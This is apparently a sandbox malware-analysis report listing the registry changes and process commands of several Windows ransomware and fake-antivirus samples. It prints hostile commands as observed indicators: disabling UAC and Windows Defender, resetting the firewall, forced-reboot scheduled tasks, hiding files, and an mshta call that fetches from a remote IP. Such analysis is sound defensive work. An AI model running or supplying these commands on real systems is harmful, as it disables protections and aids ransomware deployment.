| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" | C:\Users\Admin\AppData\Local\Temp\[email protected] | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4688 -ip 4688
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 584
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\MooskccM\OgMMAEUs.exe
"C:\Users\Admin\MooskccM\OgMMAEUs.exe"
C:\ProgramData\vyQwMwog\xsskQcks.exe
"C:\ProgramData\vyQwMwog\xsskQcks.exe"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Delete /F /TN rhaegal
C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkQQkAAs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4168 -ip 4168
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 480
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp" /SL4 $10398 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Roaming\bovdgt.exe
C:\Users\Admin\AppData\Roaming\bovdgt.exe
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 448
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewIMoUcM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmEAQMgw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Program Files (x86)\VAV\vav.exe
"C:\Program Files (x86)\VAV\vav.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\ProgramData\4749af15-06d5-4275-a22d-e0727245fc3f_31.avi", start
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\WINDOWS\302746537.exe
"C:\WINDOWS\302746537.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /F /TN rhaegal
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5464 -ip 5464
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Windows\9191.tmp
"C:\Windows\9191.tmp" \\.\pipe\{E17B18FF-AF97-4E7A-AE1A-A093BD92BC40}
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3428 -ip 3428
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Program Files (x86)\Security Central\Security Central.exe
"C:\Program Files (x86)\Security Central\Security Central.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA98.tmp\302746537.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 572
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 97761664462357.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\wrkB873.tmp", start worker
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vsQAAUoU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csgMgIsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\240628765.exe
"C:\Users\Admin\AppData\Local\Temp\240628765.exe"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\@[email protected]
"C:\Users\Admin\AppData\Local\Temp\@[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6408 -ip 6408
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 564
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp" /SL4 $10606 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MoIUIUYg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2440 -ip 2440
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 444
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OKYUkkcU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZCgAUUYE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3476 -s 2364
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 448
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\ProgramData\vyQwMwog\xsskQcks.exe
"C:\ProgramData\vyQwMwog\xsskQcks.exe"
C:\Users\Admin\MooskccM\OgMMAEUs.exe
"C:\Users\Admin\MooskccM\OgMMAEUs.exe"
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\Wbem\mofcomp.exe
mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof
C:\Windows\SysWOW64\net.exe
net start wscsvc
C:\Windows\SysWOW64\net.exe
net start winmgmt
C:\Windows\SysWOW64\net.exe
net stop winmgmt /y
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5324 -ip 5324
C:\Users\Admin\AppData\Local\Temp\[email protected]
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
C:\Windows\SysWOW64\net.exe
net stop wscsvc
C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 492 -p 3476 -ip 3476
C:\Windows\SysWOW64\mshta.exe
mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=GBQHURCC&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=1033"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6780 -ip 6780
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\VAV\vav.exe"
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6592 -ip 6592
C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 444
C:\Windows\SysWOW64\netsh.exe
netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\[email protected]" "Internet Security Guard" ENABLE
C:\Windows\SysWOW64\Wbem\mofcomp.exe
mofcomp "C:\Users\Admin\AppData\Local\Temp\1233.mof"
C:\Users\Admin\MooskccM\OgMMAEUs.exe
"C:\Users\Admin\MooskccM\OgMMAEUs.exe"
C:\ProgramData\vyQwMwog\xsskQcks.exe
